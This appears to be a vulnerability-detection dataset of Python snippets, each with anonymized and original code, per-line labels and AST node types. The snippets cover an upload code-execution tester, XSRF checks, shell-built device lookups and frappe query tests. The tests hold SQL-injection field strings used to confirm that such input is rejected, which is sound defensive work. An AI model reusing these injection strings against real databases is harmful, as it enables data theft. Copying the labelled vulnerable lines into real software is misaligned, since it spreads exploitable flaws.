"for b in getPoisoningBytes():\n",
"if VAR_48:\n",
"VAR_48 = self.detectCodeExec(VAR_41, VAR_20)\n",
"if b in VAR_35:\n",
"VAR_23['codeExec'] = True\n",
"if VAR_48:\n",
"VAR_41 = b.join(VAR_18.split(b)[:-1])\n",
"VAR_23['codeExec'] = True\n"
] | [
"def submitTestCase(self, suffix, mime, payload=None, codeExecRegex=None):...\n",
"fu = self.uploadFile(suffix, mime, payload)\n",
"uploadRes = self.isASuccessfulUpload(fu[0].text)\n",
"result = {'uploaded': False, 'codeExec': False}\n",
"if uploadRes:\n",
"result['uploaded'] = True\n",
"return result\n",
"if self.shouldLog:\n",
"self.logger.info(\"\\x1b[1;32mUpload of '%s' with mime type %s successful\\x1b[m\",\n fu[1], mime)\n",
"if uploadRes != True:\n",
"if self.shouldLog:\n",
"if codeExecRegex and valid_regex(codeExecRegex) and (self.uploadsFolder or\n",
"self.logger.info(\n '\\x1b[1;32m\\tTrue regex matched the following information : %s\\x1b[m',\n uploadRes)\n",
"url = None\n",
"secondUrl = None\n",
"if self.uploadsFolder:\n",
"url = self.schema + '://' + self.host + '/' + self.uploadsFolder + '/' + fu[1]\n",
"if self.codeExecUrlPattern:\n",
"filename = fu[1]\n",
"url = self.codeExecUrlPattern.replace('$captGroup$', uploadRes)\n",
"if url:\n",
"secondUrl = None\n",
"executedCode = self.detectCodeExec(url, codeExecRegex)\n",
"if secondUrl:\n",
"for b in getPoisoningBytes():\n",
"if executedCode:\n",
"executedCode = self.detectCodeExec(secondUrl, codeExecRegex)\n",
"if b in filename:\n",
"result['codeExec'] = True\n",
"if executedCode:\n",
"secondUrl = b.join(url.split(b)[:-1])\n",
"result['codeExec'] = True\n"
] | [
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Return'",
"Condition",
"Expr'",
"Condition",
"Condition",
"Condition",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"For",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'"
] |
[
"def FUNC_11(self):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_46 = self.xsrf_token\n",
"if not VAR_46:\n",
"return CLASS_0.validate(VAR_46, [api.get_current_identity().to_bytes()])\n"
] | [
"def verify_xsrf_token(self):...\n",
"\"\"\"docstring\"\"\"\n",
"token = self.xsrf_token\n",
"if not token:\n",
"return XSRFToken.validate(token, [api.get_current_identity().to_bytes()])\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Return'"
] |
[
"def FUNC_23(self, VAR_13):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_13 > 3:\n",
"return None\n",
"VAR_30 = '00000000'\n",
"if VAR_13 > 1:\n",
"VAR_30 = '00000001'\n",
"VAR_23, VAR_22 = shellutil.run_get_output(\n 'sysctl dev.storvsc | grep pnpinfo | grep deviceid=')\n",
"VAR_13 = VAR_13 - 2\n",
"if VAR_23:\n",
"return None\n",
"VAR_31 = '000' + ustr(VAR_13)\n",
"VAR_32 = '{0}-{1}'.format(VAR_30, VAR_31)\n",
"\"\"\"string\"\"\"\n",
"VAR_33 = 'sysctl dev.storvsc | grep pnpinfo | grep deviceid={0}'.format(VAR_32)\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_33)\n",
"if VAR_23:\n",
"return None\n",
"VAR_34 = VAR_33 + \"|awk -F . '{print $3}'\"\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_34)\n",
"\"\"\"\n try to search 'blkvscX' and 'storvscX' to find device name\n \"\"\"\n",
"VAR_22 = VAR_22.rstrip()\n",
"VAR_35 = \"camcontrol devlist -b | grep blkvsc{0} | awk '{{print $1}}'\".format(\n VAR_22)\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_35)\n",
"if VAR_23 == 0:\n",
"VAR_22 = VAR_22.rstrip()\n",
"VAR_36 = \"camcontrol devlist -b | grep storvsc{0} | awk '{{print $1}}'\".format(\n VAR_22)\n",
"VAR_37 = (\n \"camcontrol devlist | grep {0} | awk -F \\\\( '{{print $2}}'|sed -e 's/.*(//'| sed -e 's/).*//'\"\n .format(VAR_22))\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_36)\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_37)\n",
"if VAR_23 == 0:\n",
"if VAR_23 == 0:\n",
"VAR_22 = VAR_22.rstrip()\n",
"return None\n",
"for possible in VAR_22.rstrip().split(','):\n",
"VAR_37 = (\n \"camcontrol devlist | grep {0} | awk -F \\\\( '{{print $2}}'|sed -e 's/.*(//'| sed -e 's/).*//'\"\n .format(VAR_22))\n",
"if not possible.startswith('pass'):\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_37)\n",
"return possible\n",
"if VAR_23 == 0:\n",
"for possible in VAR_22.rstrip().split(','):\n",
"if not possible.startswith('pass'):\n",
"return possible\n"
] | [
"def device_for_ide_port(self, port_id):...\n",
"\"\"\"docstring\"\"\"\n",
"if port_id > 3:\n",
"return None\n",
"g0 = '00000000'\n",
"if port_id > 1:\n",
"g0 = '00000001'\n",
"err, output = shellutil.run_get_output(\n 'sysctl dev.storvsc | grep pnpinfo | grep deviceid=')\n",
"port_id = port_id - 2\n",
"if err:\n",
"return None\n",
"g1 = '000' + ustr(port_id)\n",
"g0g1 = '{0}-{1}'.format(g0, g1)\n",
"\"\"\"\n search 'X' from 'dev.storvsc.X.%pnpinfo: classid=32412632-86cb-44a2-9b5c-50d1417354f5 deviceid=00000000-0001-8899-0000-000000000000'\n \"\"\"\n",
"cmd_search_ide = ('sysctl dev.storvsc | grep pnpinfo | grep deviceid={0}'.\n format(g0g1))\n",
"err, output = shellutil.run_get_output(cmd_search_ide)\n",
"if err:\n",
"return None\n",
"cmd_extract_id = cmd_search_ide + \"|awk -F . '{print $3}'\"\n",
"err, output = shellutil.run_get_output(cmd_extract_id)\n",
"\"\"\"\n try to search 'blkvscX' and 'storvscX' to find device name\n \"\"\"\n",
"output = output.rstrip()\n",
"cmd_search_blkvsc = (\n \"camcontrol devlist -b | grep blkvsc{0} | awk '{{print $1}}'\".format(\n output))\n",
"err, output = shellutil.run_get_output(cmd_search_blkvsc)\n",
"if err == 0:\n",
"output = output.rstrip()\n",
"cmd_search_storvsc = (\n \"camcontrol devlist -b | grep storvsc{0} | awk '{{print $1}}'\".format(\n output))\n",
"cmd_search_dev = (\n \"camcontrol devlist | grep {0} | awk -F \\\\( '{{print $2}}'|sed -e 's/.*(//'| sed -e 's/).*//'\"\n .format(output))\n",
"err, output = shellutil.run_get_output(cmd_search_storvsc)\n",
"err, output = shellutil.run_get_output(cmd_search_dev)\n",
"if err == 0:\n",
"if err == 0:\n",
"output = output.rstrip()\n",
"return None\n",
"for possible in output.rstrip().split(','):\n",
"cmd_search_dev = (\n \"camcontrol devlist | grep {0} | awk -F \\\\( '{{print $2}}'|sed -e 's/.*(//'| sed -e 's/).*//'\"\n .format(output))\n",
"if not possible.startswith('pass'):\n",
"err, output = shellutil.run_get_output(cmd_search_dev)\n",
"return possible\n",
"if err == 0:\n",
"for possible in output.rstrip().split(','):\n",
"if not possible.startswith('pass'):\n",
"return possible\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Assign'",
"Return'",
"For",
"Assign'",
"Condition",
"Assign'",
"Return'",
"Condition",
"For",
"Condition",
"Return'"
] |
[
"\"\"\"string\"\"\"\n",
"import copy\n",
"from flask import current_app, session\n",
"from flask.ext.login import current_user\n",
"from invenio.ext.sqlalchemy.utils import session_manager\n",
"VAR_0 = dict(title='ORCID', description=\n 'Connecting Research and Researchers.', icon='', authorized_handler=\n 'invenio.modules.oauthclient.handlers:authorized_signup_handler',\n disconnect_handler=\n 'invenio.modules.oauthclient.handlers:disconnect_handler',\n signup_handler=dict(info=\n 'invenio.modules.oauthclient.contrib.orcid:account_info', setup=\n 'invenio.modules.oauthclient.contrib.orcid:account_setup', view=\n 'invenio.modules.oauthclient.handlers:signup_handler'), params=dict(\n request_token_params={'scope': '/authenticate'}, base_url=\n 'https://pub.orcid.com/', request_token_url=None, access_token_url=\n 'https://pub.orcid.org/oauth/token', access_token_method='POST',\n authorize_url='https://orcid.org/oauth/authorize#show_login', app_key=\n 'ORCID_APP_CREDENTIALS', content_type='application/json'))\n",
"\"\"\" ORCID Remote Application. \"\"\"\n",
"VAR_1 = copy.deepcopy(VAR_0)\n",
"\"\"\"ORCID Sandbox Remote Application.\"\"\"\n",
"VAR_1['params'].update(dict(base_url='https://api.sandbox.orcid.org/',\n access_token_url='https://api.sandbox.orcid.org/oauth/token',\n authorize_url='https://sandbox.orcid.org/oauth/authorize#show_login'))\n",
"def FUNC_0(VAR_2, VAR_3):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_5 = dict(external_id=resp.get('orcid'), external_method='orcid')\n",
"return VAR_5\n"
] | [
"\"\"\"Pre-configured remote application for enabling sign in/up with ORCID.\n\n**Usage:**\n\n1. Edit your configuration and add:\n\n .. code-block:: python\n\n from invenio.modules.oauthclient.contrib import orcid\n OAUTHCLIENT_REMOTE_APPS = dict(\n orcid=orcid.REMOTE_APP,\n )\n\n ORCID_APP_CREDENTIALS = dict(\n consumer_key=\"changeme\",\n consumer_secret=\"changeme\",\n )\n\n Note, if you want to use the ORCID sandbox, use ``orcid.REMOTE_SANDBOX_APP``\n instead of ``orcid.REMOTE_APP``.\n\n2. Register a new application with ORCID. When registering the\n application ensure that the *Redirect URI* points to:\n ``CFG_SITE_SECURE_URL/oauth/authorized/orcid/`` (note, ORCID does not\n allow localhost to be used, thus testing on development machines is\n somewhat complicated by this).\n\n\n3. Grab the *Client ID* and *Client Secret* after registering the application\n and add them to your instance configuration (``invenio.cfg``):\n\n .. code-block:: python\n\n ORCID_APP_CREDENTIALS = dict(\n consumer_key=\"<CLIENT ID>\",\n consumer_secret=\"<CLIENT SECRET>\",\n )\n\n4. Now go to ``CFG_SITE_SECURE_URL/oauth/login/orcid/`` (e.g.\n http://localhost:4000/oauth/login/orcid/)\n\n5. Also, you should see ORCID listed under Linked accounts:\n http://localhost:4000//account/settings/linkedaccounts/\n\nBy default the ORCID module will try first look if a link already exists\nbetween a ORCID account and a user. If no link is found, the user is asked\nto provide an email address to sign-up.\n\nIn templates you can add a sign in/up link:\n\n.. code-block:: jinja\n\n <a href=\"{{url_for('oauthclient.login', remote_app='orcid')}}\">Sign in with ORCID</a>\n\n\"\"\"\n",
"import copy\n",
"from flask import current_app, session\n",
"from flask.ext.login import current_user\n",
"from invenio.ext.sqlalchemy.utils import session_manager\n",
"REMOTE_APP = dict(title='ORCID', description=\n 'Connecting Research and Researchers.', icon='', authorized_handler=\n 'invenio.modules.oauthclient.handlers:authorized_signup_handler',\n disconnect_handler=\n 'invenio.modules.oauthclient.handlers:disconnect_handler',\n signup_handler=dict(info=\n 'invenio.modules.oauthclient.contrib.orcid:account_info', setup=\n 'invenio.modules.oauthclient.contrib.orcid:account_setup', view=\n 'invenio.modules.oauthclient.handlers:signup_handler'), params=dict(\n request_token_params={'scope': '/authenticate'}, base_url=\n 'https://pub.orcid.com/', request_token_url=None, access_token_url=\n 'https://pub.orcid.org/oauth/token', access_token_method='POST',\n authorize_url='https://orcid.org/oauth/authorize#show_login', app_key=\n 'ORCID_APP_CREDENTIALS', content_type='application/json'))\n",
"\"\"\" ORCID Remote Application. \"\"\"\n",
"REMOTE_SANDBOX_APP = copy.deepcopy(REMOTE_APP)\n",
"\"\"\"ORCID Sandbox Remote Application.\"\"\"\n",
"REMOTE_SANDBOX_APP['params'].update(dict(base_url=\n 'https://api.sandbox.orcid.org/', access_token_url=\n 'https://api.sandbox.orcid.org/oauth/token', authorize_url=\n 'https://sandbox.orcid.org/oauth/authorize#show_login'))\n",
"def account_info(remote, resp):...\n",
"\"\"\"docstring\"\"\"\n",
"account_info = dict(external_id=resp.get('orcid'), external_method='orcid')\n",
"return account_info\n"
] | [
0,
0,
0,
0,
0,
5,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"FunctionDef'",
"Docstring",
"Assign'",
"Return'"
] |
[
"def FUNC_13(self):...\n",
"\"\"\"docstring\"\"\"\n",
"return self.task.__acl__()\n"
] | [
"def get_discount_line_acl(self):...\n",
"\"\"\"docstring\"\"\"\n",
"return self.task.__acl__()\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def __init__(self, VAR_0, VAR_1):...\n",
"self.user = VAR_0\n",
"self.file = VAR_1\n",
"self.raw_data = None\n"
] | [
"def __init__(self, user, file):...\n",
"self.user = user\n",
"self.file = file\n",
"self.raw_data = None\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'"
] |
[
"def FUNC_1(self):...\n",
"self.start_time = time.time()\n",
"VAR_13 = []\n",
"VAR_14 = 3\n",
"VAR_15 = len(self.scenes)\n",
"for i in range(VAR_14):\n",
"VAR_18 = int(VAR_15 / VAR_14 * i)\n",
"for VAR_20 in VAR_13:\n",
"VAR_19 = int(VAR_15 / VAR_14 * (i + 1))\n",
"VAR_3.info('abouto call join for the analysis thread {}'.format(VAR_20.name))\n",
"VAR_3.info('we have joined all threads. Should tweet after this')\n",
"VAR_9 = self.scenes[VAR_18:VAR_19]\n",
"VAR_20.join()\n",
"if not VAR_0 and VAR_2:\n",
"VAR_8 = [VAR_10.get_name() for VAR_10 in VAR_9]\n",
"VAR_21 = time.time() - self.start_time\n",
"VAR_0 = True\n",
"VAR_20 = Thread(target=self.analyze_scenes, VAR_8=str(name), args=(chunk,))\n",
"VAR_22 = VAR_21 / 60\n",
"VAR_21 = time.time() - self.start_time\n",
"VAR_3.info('Trying to start the analysis thread for scenes {}'.format(\n VAR_20.name))\n",
"VAR_3.info('joining for the analysis thread {} in {} minutes'.format(VAR_20\n .name, VAR_22))\n",
"VAR_22 = VAR_21 / 60\n",
"VAR_20.start()\n",
"if not VAR_0 and VAR_2:\n",
"VAR_3.info(\n 'Just finished analyzing scenes for the first time. It took {} minutes. About to tweet'\n .format(VAR_22))\n",
"VAR_13.append(VAR_20)\n",
"tweet('joining for the analysis thread {} in {} minutes'.format(VAR_20.\n name, VAR_22))\n",
"tweet('Done loading scene data. Took {} minutes'.format(VAR_22))\n"
] | [
"def create_analysis_threads(self):...\n",
"self.start_time = time.time()\n",
"threads = []\n",
"num_threads = 3\n",
"length = len(self.scenes)\n",
"for i in range(num_threads):\n",
"i1 = int(length / num_threads * i)\n",
"for t in threads:\n",
"i2 = int(length / num_threads * (i + 1))\n",
"LOG.info('abouto call join for the analysis thread {}'.format(t.name))\n",
"LOG.info('we have joined all threads. Should tweet after this')\n",
"chunk = self.scenes[i1:i2]\n",
"t.join()\n",
"if not analyzed_scenes and should_tweet:\n",
"name = [scene.get_name() for scene in chunk]\n",
"seconds_to_analyze = time.time() - self.start_time\n",
"analyzed_scenes = True\n",
"t = Thread(target=self.analyze_scenes, name=str(name), args=(chunk,))\n",
"minutes = seconds_to_analyze / 60\n",
"seconds_to_analyze = time.time() - self.start_time\n",
"LOG.info('Trying to start the analysis thread for scenes {}'.format(t.name))\n",
"LOG.info('joining for the analysis thread {} in {} minutes'.format(t.name,\n minutes))\n",
"minutes = seconds_to_analyze / 60\n",
"t.start()\n",
"if not analyzed_scenes and should_tweet:\n",
"LOG.info(\n 'Just finished analyzing scenes for the first time. It took {} minutes. About to tweet'\n .format(minutes))\n",
"threads.append(t)\n",
"tweet('joining for the analysis thread {} in {} minutes'.format(t.name,\n minutes))\n",
"tweet('Done loading scene data. Took {} minutes'.format(minutes))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"For",
"Assign'",
"For",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_12(self):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_22 = self.env['crapo.automaton']\n",
"VAR_23 = self.env['ir.model'].search([('model', '=', self._state_for_model)\n ], limit=1)\n",
"VAR_24 = VAR_22.search([('model_id', '=', VAR_23.id)])\n",
"if not VAR_24:\n",
"VAR_24 = VAR_22.create({'name': 'Automaton for {}'.format(self.\n _state_for_model), 'model_id': VAR_23.id})\n",
"return VAR_24\n"
] | [
"def _do_search_default_automaton(self):...\n",
"\"\"\"docstring\"\"\"\n",
"automaton_model = self.env['crapo.automaton']\n",
"my_model = self.env['ir.model'].search([('model', '=', self.\n _state_for_model)], limit=1)\n",
"my_automaton = automaton_model.search([('model_id', '=', my_model.id)])\n",
"if not my_automaton:\n",
"my_automaton = automaton_model.create({'name': 'Automaton for {}'.format(\n self._state_for_model), 'model_id': my_model.id})\n",
"return my_automaton\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Return'"
] |
[
"\"\"\"string\"\"\"\n",
"import argparse\n",
"import importlib\n",
"import os\n",
"import sys\n",
"from parlai.core.agents import get_agent_module, get_task_module\n",
"from parlai.tasks.tasks import ids_to_tasks\n",
"def FUNC_0(VAR_0):...\n",
"VAR_3 = VAR_0.lower()\n",
"if VAR_3 in ('yes', 'true', 't', '1', 'y'):\n",
"return True\n",
"if VAR_3 in ('no', 'false', 'f', 'n', '0'):\n",
"return False\n",
"def FUNC_1(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"if ':' not in VAR_0:\n",
"VAR_4 = VAR_0.split(':')\n",
"VAR_5 = importlib.import_module(VAR_4[0])\n",
"return getattr(VAR_5, VAR_4[1])\n"
] | [
"\"\"\"Provides an argument parser and a set of default command line options for\nusing the ParlAI package.\n\"\"\"\n",
"import argparse\n",
"import importlib\n",
"import os\n",
"import sys\n",
"from parlai.core.agents import get_agent_module, get_task_module\n",
"from parlai.tasks.tasks import ids_to_tasks\n",
"def str2bool(value):...\n",
"v = value.lower()\n",
"if v in ('yes', 'true', 't', '1', 'y'):\n",
"return True\n",
"if v in ('no', 'false', 'f', 'n', '0'):\n",
"return False\n",
"def str2class(value):...\n",
"\"\"\"docstring\"\"\"\n",
"if ':' not in value:\n",
"name = value.split(':')\n",
"module = importlib.import_module(name[0])\n",
"return getattr(module, name[1])\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Assign'",
"Condition",
"Return'",
"Condition",
"Return'",
"FunctionDef'",
"Docstring",
"Condition",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_2(self, VAR_1, VAR_2, *VAR_3, **VAR_4):...\n",
"self.handled_resp = VAR_1\n",
"self.handled_remote = VAR_2\n",
"self.handled_args = VAR_3\n",
"self.handled_kwargs = VAR_4\n",
"return 'TEST'\n"
] | [
"def handler(self, resp, remote, *args, **kwargs):...\n",
"self.handled_resp = resp\n",
"self.handled_remote = remote\n",
"self.handled_args = args\n",
"self.handled_kwargs = kwargs\n",
"return 'TEST'\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'"
] |
[
"from __future__ import unicode_literals\n",
"import frappe, unittest\n",
"from frappe.model.db_query import DatabaseQuery\n",
"from frappe.desk.reportview import get_filters_cond\n",
"def FUNC_1(self):...\n",
"self.assertTrue({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n limit_page_length=None))\n",
"def FUNC_2(self):...\n",
"self.assertTrue({'name': 'DocType', 'issingle': 0} in DatabaseQuery(\n 'DocType').execute(fields=['name', 'issingle'], limit_page_length=None))\n",
"def FUNC_3(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters=[['DocType', 'name', 'like', 'J%']]))\n",
"def FUNC_4(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters=[{'name': ['like', 'J%']}]))\n",
"def FUNC_5(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters={'name': ['like', 'J%']}))\n",
"def FUNC_6(self):...\n",
"self.assertTrue({'name': 'DocField'} in DatabaseQuery('DocType').execute(\n filters={'name': 'DocField'}))\n",
"def FUNC_7(self):...\n",
"self.assertFalse(DatabaseQuery('DocType').execute(filters={'name': ['in',\n None]}))\n",
"self.assertTrue({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters={'name': ['not in', None]}))\n",
"for result in [{'name': 'DocType'}, {'name': 'DocField'}]:\n",
"self.assertTrue(result in DatabaseQuery('DocType').execute(filters={'name':\n ['in', 'DocType,DocField']}))\n",
"for result in [{'name': 'DocType'}, {'name': 'DocField'}]:\n",
"self.assertFalse(result in DatabaseQuery('DocType').execute(filters={'name':\n ['not in', 'DocType,DocField']}))\n",
"def FUNC_8(self):...\n",
"VAR_3 = DatabaseQuery('DocField').execute(filters={'parent': 'DocType'},\n fields=['fieldname', 'fieldtype'], or_filters=[{'fieldtype': 'Table'},\n {'fieldtype': 'Select'}])\n",
"self.assertTrue({'fieldtype': 'Table', 'fieldname': 'fields'} in VAR_3)\n",
"self.assertTrue({'fieldtype': 'Select', 'fieldname': 'document_type'} in VAR_3)\n",
"self.assertFalse({'fieldtype': 'Check', 'fieldname': 'issingle'} in VAR_3)\n",
"def FUNC_9(self):...\n",
"\"\"\"docstring\"\"\"\n",
"frappe.db.sql('delete from tabEvent')\n",
"VAR_4 = FUNC_0()\n",
"VAR_5 = FUNC_0(VAR_1='2016-07-05 23:59:59')\n",
"VAR_6 = FUNC_0(VAR_1='2016-07-06 00:00:00')\n",
"VAR_7 = FUNC_0(VAR_1='2016-07-07 23:59:59')\n",
"VAR_8 = FUNC_0(VAR_1='2016-07-08 00:00:01')\n",
"VAR_3 = DatabaseQuery('Event').execute(filters={'starts_on': ['between',\n None]}, fields=['name'])\n",
"self.assertTrue({'name': VAR_5.name} not in VAR_3)\n",
"VAR_3 = DatabaseQuery('Event').execute(filters={'starts_on': ['between', [\n '2016-07-06', '2016-07-07']]}, fields=['name'])\n",
"self.assertTrue({'name': VAR_6.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_7.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_5.name} not in VAR_3)\n",
"self.assertTrue({'name': VAR_8.name} not in VAR_3)\n",
"VAR_3 = DatabaseQuery('Event').execute(filters={'starts_on': ['between', [\n '2016-07-07']]}, fields=['name'])\n",
"self.assertTrue({'name': VAR_7.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_8.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_4.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_5.name} not in VAR_3)\n",
"self.assertTrue({'name': VAR_6.name} not in VAR_3)\n",
"def FUNC_10(self):...\n",
"frappe.set_user('[email protected]')\n",
"self.assertRaises(frappe.PermissionError, get_filters_cond, 'DocType', dict\n (istable=1), [])\n",
"self.assertTrue(get_filters_cond('DocType', dict(istable=1), [],\n ignore_permissions=True))\n",
"frappe.set_user('Administrator')\n",
"def FUNC_11(self):...\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name', 'issingle, version()'], limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n 'issingle, IF(issingle=1, (select name from tabUser), count(name))'],\n limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name', 'issingle, (select count(*) from tabSessions)'],\n limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n \"issingle, SELECT LOCATE('', `tabUser`.`user`) AS user;\"], limit_start=\n 0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n 'issingle, IF(issingle=1, (SELECT name from tabUser), count(*))'],\n limit_start=0, limit_page_length=1)\n",
"VAR_3 = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'count(name)'], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('count(name)' in VAR_3[0])\n",
"VAR_3 = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n \"locate('', name) as _relevance\"], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('_relevance' in VAR_3[0])\n",
"VAR_3 = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'date(creation) as creation'], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('creation' in VAR_3[0])\n",
"VAR_3 = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'datediff(modified, creation) as date_diff'], limit_start=0,\n limit_page_length=1)\n",
"self.assertTrue('date_diff' in VAR_3[0])\n",
"def FUNC_0(VAR_0='_Test Event', VAR_1=None):...\n",
"\"\"\"docstring\"\"\"\n",
"from frappe.utils import get_datetime\n",
"VAR_2 = frappe.get_doc({'doctype': 'Event', 'subject': VAR_0, 'event_type':\n 'Public', 'starts_on': get_datetime(VAR_1)}).insert(ignore_permissions=True\n )\n",
"return VAR_2\n"
] | [
"from __future__ import unicode_literals\n",
"import frappe, unittest\n",
"from frappe.model.db_query import DatabaseQuery\n",
"from frappe.desk.reportview import get_filters_cond\n",
"def test_basic(self):...\n",
"self.assertTrue({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n limit_page_length=None))\n",
"def test_fields(self):...\n",
"self.assertTrue({'name': 'DocType', 'issingle': 0} in DatabaseQuery(\n 'DocType').execute(fields=['name', 'issingle'], limit_page_length=None))\n",
"def test_filters_1(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters=[['DocType', 'name', 'like', 'J%']]))\n",
"def test_filters_2(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters=[{'name': ['like', 'J%']}]))\n",
"def test_filters_3(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters={'name': ['like', 'J%']}))\n",
"def test_filters_4(self):...\n",
"self.assertTrue({'name': 'DocField'} in DatabaseQuery('DocType').execute(\n filters={'name': 'DocField'}))\n",
"def test_in_not_in_filters(self):...\n",
"self.assertFalse(DatabaseQuery('DocType').execute(filters={'name': ['in',\n None]}))\n",
"self.assertTrue({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters={'name': ['not in', None]}))\n",
"for result in [{'name': 'DocType'}, {'name': 'DocField'}]:\n",
"self.assertTrue(result in DatabaseQuery('DocType').execute(filters={'name':\n ['in', 'DocType,DocField']}))\n",
"for result in [{'name': 'DocType'}, {'name': 'DocField'}]:\n",
"self.assertFalse(result in DatabaseQuery('DocType').execute(filters={'name':\n ['not in', 'DocType,DocField']}))\n",
"def test_or_filters(self):...\n",
"data = DatabaseQuery('DocField').execute(filters={'parent': 'DocType'},\n fields=['fieldname', 'fieldtype'], or_filters=[{'fieldtype': 'Table'},\n {'fieldtype': 'Select'}])\n",
"self.assertTrue({'fieldtype': 'Table', 'fieldname': 'fields'} in data)\n",
"self.assertTrue({'fieldtype': 'Select', 'fieldname': 'document_type'} in data)\n",
"self.assertFalse({'fieldtype': 'Check', 'fieldname': 'issingle'} in data)\n",
"def test_between_filters(self):...\n",
"\"\"\"docstring\"\"\"\n",
"frappe.db.sql('delete from tabEvent')\n",
"todays_event = create_event()\n",
"event1 = create_event(starts_on='2016-07-05 23:59:59')\n",
"event2 = create_event(starts_on='2016-07-06 00:00:00')\n",
"event3 = create_event(starts_on='2016-07-07 23:59:59')\n",
"event4 = create_event(starts_on='2016-07-08 00:00:01')\n",
"data = DatabaseQuery('Event').execute(filters={'starts_on': ['between',\n None]}, fields=['name'])\n",
"self.assertTrue({'name': event1.name} not in data)\n",
"data = DatabaseQuery('Event').execute(filters={'starts_on': ['between', [\n '2016-07-06', '2016-07-07']]}, fields=['name'])\n",
"self.assertTrue({'name': event2.name} in data)\n",
"self.assertTrue({'name': event3.name} in data)\n",
"self.assertTrue({'name': event1.name} not in data)\n",
